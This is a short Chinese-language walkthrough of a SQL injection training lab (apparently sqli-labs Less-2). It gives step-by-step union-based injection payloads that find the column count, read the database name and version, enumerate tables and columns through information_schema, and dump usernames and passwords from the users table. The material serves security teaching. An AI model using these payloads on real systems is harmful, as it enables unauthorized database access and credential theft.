less2
同Less1相同,存在注入点
输入
?id=1'
说明我们输入的数据被原封不动的带入了,无需要在1后面加单引号
(1)爆字段
?id=1 order by 4
字段为3.
(2)用union联合查询
?id=-1 union select 1,version(),database()
Php版本为5.5.53,数据库名字为security。
(3)爆表
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23
(4)爆列名
查看表users的所有列
?id=-1%20 union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23
(5)查看users表内容
?id=-1%20 union select 1,password,username from users where id=2%23
